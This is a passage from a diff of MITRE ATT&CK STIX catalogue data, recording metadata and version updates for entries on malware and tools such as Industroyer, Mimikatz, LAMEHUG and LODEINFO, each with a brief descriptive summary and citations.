+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-19 16:36:54.302000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--f8dfbc54-b070-4224-b560-79aaa5f835bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:15.910000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "H1N1",
+                    "description": "[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0132",
+                            "external_id": "S0132"
+                        },
+                        {
+                            "source_name": "Cisco H1N1 Part 1",
+                            "description": "Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.",
+                            "url": "http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "H1N1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2025-04-25 14:45:07.358000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--bd0536d7-b081-43ae-a773-cfb057c5b988",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "HARDRAIN",
+                    "description": "[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0246",
+                            "external_id": "S0246"
+                        },
+                        {
+                            "source_name": "HARDRAIN",
+                            "description": "(Citation: US-CERT HARDRAIN March 2018)"
+                        },
+                        {
+                            "source_name": "US-CERT HARDRAIN March 2018",
+                            "description": "US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.",
+                            "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "HARDRAIN"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2025-04-25 14:44:34.161000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--1996aed9-6234-4c1d-a145-e8a4913679dd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-08-05 18:12:15.228000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "Havoc",
+                    "description": "[Havoc](https://attack.mitre.org/software/S1229) is an open-source post-exploitation command and control (C2) framework first released on GitHub in October 2022 by C5pider (Paul Ungur), who continues to maintain and develop it with community contributors. [Havoc](https://attack.mitre.org/software/S1229) provides a wide range of offensive security capabilities and has been adopted by multiple threat actors to establish and maintain control over compromised systems.",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1229",
+                            "external_id": "S1229"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Havoc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Enis Aksu"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-20 12:17:28.794000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--9edc41d1-a13d-4acf-b400-d47fb2f6809d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-17 17:12:08.208000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "HiddenFace",
+                    "description": "[HiddenFace](https://attack.mitre.org/software/S9023) is a modular backdoor developed and used exclusively by [MirrorFace](https://attack.mitre.org/groups/G1054) since at least 2021. [HiddenFace](https://attack.mitre.org/software/S9023) can communicate both actively and passively and has been used against political and academic targets.(Citation: JPCERT MirrorFace JUL 2024)(Citation: Trend Micro Earth Kasha NOV 2024)(Citation: Trend Micro Earth Kasha Updates APR 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9023",
+                            "external_id": "S9023"
+                        },
+                        {
+                            "source_name": "NOOPDOOR",
+                            "description": "(Citation: ESET HiddenFace 2024)(Citation: Trend Micro Earth Kasha NOV 2024)(Citation: Trend Micro Earth Kasha Updates APR 2025)"
+                        },
+                        {
+                            "source_name": "ESET HiddenFace 2024",
+                            "description": "Breitenbacher, D. (2024). Unmasking HiddenFace. Retrieved April 17, 2026.",
+                            "url": "https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_8_Breitenbacher_en.pdf"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Kasha Updates APR 2025",
+                            "description": "Hiroaki, H. (2025, April 30). Earth Kasha Updates TTPs in Latest Campaign Targeting Taiwan and Japan. Retrieved April 17, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html"
+                        },
+                        {
+                            "source_name": "JPCERT MirrorFace JUL 2024",
+                            "description": "Tomonaga, S. (2024, July 16). MirrorFace Attack against Japanese Organisations. Retrieved April 17, 2026.",
+                            "url": "https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Kasha NOV 2024",
+                            "description": "Trend Micro. (2024, November 19). Spot the Difference: Earth Kasha's New LODEINFO Campaign And The Correlation Analysis With The APT10 Umbrella. Retrieved April 17, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "HiddenFace",
+                        "NOOPDOOR"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dominik Breitenbacher, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-24 02:31:26.041000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--26c87906-d750-42c5-946c-d4162c73fc7b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-01-31 01:39:56.283000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Impacket",
+                    "description": "[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0357",
+                            "external_id": "S0357"
+                        },
+                        {
+                            "source_name": "Impacket Tools",
+                            "description": "SecureAuth. (n.d.).  Retrieved January 15, 2019.",
+                            "url": "https://www.secureauth.com/labs/open-source-tools/impacket"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Impacket"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jacob Wilkin, Trustwave, SpiderLabs"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2025-04-04 17:16:12.597000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.8"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-01-04 20:42:21.997000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "Industroyer",
+                    "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0604",
+                            "external_id": "S0604"
+                        },
+                        {
+                            "source_name": "CRASHOVERRIDE",
+                            "description": "(Citation: Dragos Crashoverride 2017)"
+                        },
+                        {
+                            "source_name": "Win32/Industroyer",
+                            "description": "(Citation: ESET Industroyer)"
+                        },
+                        {
+                            "source_name": "ESET Industroyer",
+                            "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
+                        },
+                        {
+                            "source_name": "Dragos Crashoverride 2017",
+                            "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.",
+                            "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
+                        },
+                        {
+                            "source_name": "Dragos Crashoverride 2018",
+                            "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.",
+                            "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Industroyer",
+                        "CRASHOVERRIDE",
+                        "Win32/Industroyer"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence",
+                        "Joe Slowik - Dragos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 14:11:53.057000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--089aa00a-99ac-46b4-9cf8-4224d463566d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 12:42:31.383000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "IronWind",
+                    "description": "[IronWind](https://attack.mitre.org/software/S9029) is a custom loader malware that has been in use since at least 2023 by actors including [WIRTE](https://attack.mitre.org/groups/G0090) to target entities in the Middle East.(Citation: Check Point Wirte NOV 2024)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9029",
+                            "external_id": "S9029"
+                        },
+                        {
+                            "source_name": "Check Point Wirte NOV 2024",
+                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
+                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "IronWind"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2026-04-22 00:32:35.569000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--c55e0410-842d-4365-a2c8-26c0330f85b8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-21 12:07:59.044000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "LAMEHUG",
+                    "description": "[LAMEHUG](https://attack.mitre.org/software/S9035) is Python-based information stealer first identified in July 2025 by Ukraine's Computer Emergency Response Team (CERT-UA) in phishing emails targeting Ukrainian government officials. [LAMEHUG](https://attack.mitre.org/software/S9035) is the first known malware to integrate artificial intelligence (AI) directly into its attack workflow by querying large language models (LLMs) hosted on Hugging Face to dynamically generate reconnaissance, data theft, and system manipulation commands in real time.  [LAMEHUG](https://attack.mitre.org/software/S9035) has been attributed to [APT28](https://attack.mitre.org/groups/G0007). (Citation: Splunk LAMEHUG SEP 2025)(Citation: Nov AI Threat Tracker)(Citation: Cato LAMEHUG JUL 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9035",
+                            "external_id": "S9035"
+                        },
+                        {
+                            "source_name": "PROMPTSTEAL",
+                            "description": "(Citation: Nov AI Threat Tracker)"
+                        },
+                        {
+                            "source_name": "Splunk LAMEHUG SEP 2025",
+                            "description": "Conteras, T., Splunk Research Team. (2025, September 25). From Prompt to Payload: LAMEHUG\u2019s LLM-Driven Cyber Intrusion. Retrieved April 21, 2026.",
+                            "url": "https://www.splunk.com/en_us/blog/security/lamehug-ai-driven-malware-llm-cyber-intrusion-analysis.html"
+                        },
+                        {
+                            "source_name": "Nov AI Threat Tracker",
+                            "description": "Google Threat Intelligence Group. (2025, November 5). GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools. Retrieved March 31, 2026.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"
+                        },
+                        {
+                            "source_name": "Cato LAMEHUG JUL 2025",
+                            "description": "Simonovich, V. (2025, July 23). Cato CTRL\u2122 Threat Research: Analyzing LAMEHUG \u2013 First Known LLM-Powered Malware with Links to APT28 (Fancy Bear) . Retrieved April 21, 2026.",
+                            "url": "https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "LAMEHUG",
+                        "PROMPTSTEAL"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 23:56:18.785000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--7908f855-5b5b-4d6a-acbc-af6b45ec27ad",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-17 14:45:26.266000+00:00",
+                    "modified": "2026-05-12 15:12:00.735000+00:00",
+                    "name": "LODEINFO",
+                    "description": "[LODEINFO](https://attack.mitre.org/software/S9020) is a fileless backdoor malware first identified in 2020 that has been used by actors including [MirrorFace](https://attack.mitre.org/groups/G1054), primarily against media, diplomatic, governmental, and public sector organizations in Japan.(Citation: Kaspersky LODEINFO OCT 2022)(Citation: ITOCHU LODEINFO JAN 2024)(Citation: ESET MirrorFace DEC 2022)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9020",
+                            "external_id": "S9020"
+                        },
+                        {
+                            "source_name": "ESET MirrorFace DEC 2022",
+                            "description": "Breitenbacher, D. (2022, December 14). Unmasking MirrorFace: Operation LiberalFace targeting Japanese political entities. Retrieved April 17, 2026.",
+                            "url": "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/"
+                        },
+                        {
+                            "source_name": "Kaspersky LODEINFO OCT 2022",
+                            "description": "Ishimaru, S. (2022, October 31). APT10: Tracking down LODEINFO 2022, part I. Retrieved April 17, 2026.",
+                            "url": "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
+                        },
+                        {
+                            "source_name": "ITOCHU LODEINFO JAN 2024",
+                            "description": "ITOCHU. (2024, January 24). The Endless Struggle Against APT10: Insights from LODEINFO v0.6.6 - v0.7.3 Analysis. Retrieved April 17, 2026.",
+                            "url": "https://blog-en.itochuci.co.jp/entry/2024/01/24/134100"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "LODEINFO"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dominik Breitenbacher, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.735000+00:00\", \"old_value\": \"2026-04-24 02:29:49.185000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-04-16 19:00:49.435000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "LockerGoga",
+                    "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0372",
+                            "external_id": "S0372"
+                        },
+                        {
+                            "source_name": "CarbonBlack LockerGoga 2019",
+                            "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.",
+                            "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/"
+                        },
+                        {
+                            "source_name": "Unit42 LockerGoga 2019",
+                            "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "LockerGoga"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Joe Slowik - Dragos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-22 22:21:12.036000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--975737f1-b10d-476f-8bda-3ec26ea57172",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-08-13 17:15:25.702000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "MCMD",
+                    "description": "[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly](https://attack.mitre.org/groups/G0035).(Citation: Secureworks MCMD July 2019)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0500",
+                            "external_id": "S0500"
+                        },
+                        {
+                            "source_name": "Secureworks MCMD July 2019",
+                            "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.",
+                            "url": "https://www.secureworks.com/research/mcmd-malware-analysis"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "MCMD"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 14:07:56.328000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:11.544000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Mimikatz",
+                    "description": "[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0002",
+                            "external_id": "S0002"
+                        },
+                        {
+                            "source_name": "Deply Mimikatz",
+                            "description": "Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.",
+                            "url": "https://github.com/gentilkiwi/mimikatz"
+                        },
+                        {
+                            "source_name": "Adsecurity Mimikatz Guide",
+                            "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.",
+                            "url": "https://adsecurity.org/?page_id=1821"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Mimikatz"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Vincent Le Toux"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.11",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-19 18:13:24.015000+00:00\"}}}",
+                    "previous_version": "1.11"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--66637cd6-ae68-4bcd-af82-32f70a854175",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-17 18:35:44.528000+00:00",
+                    "modified": "2026-05-12 15:12:00.734000+00:00",
+                    "name": "NOOPLDR",
+                    "description": "[NOOPLDR](https://attack.mitre.org/software/S9025) is a shellcode loader with XML/C# and DLL versions that has been used by [MirrorFace](https://attack.mitre.org/groups/G1054) to load [HiddenFace](https://attack.mitre.org/software/S9023).(Citation: Trend Micro Earth Kasha NOV 2024)\n",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9025",
+                            "external_id": "S9025"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Kasha NOV 2024",
+                            "description": "Trend Micro. (2024, November 19). Spot the Difference: Earth Kasha's New LODEINFO Campaign And The Correlation Analysis With The APT10 Umbrella. Retrieved April 17, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "NOOPLDR"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dominik Breitenbacher, ESET"
+                    ],
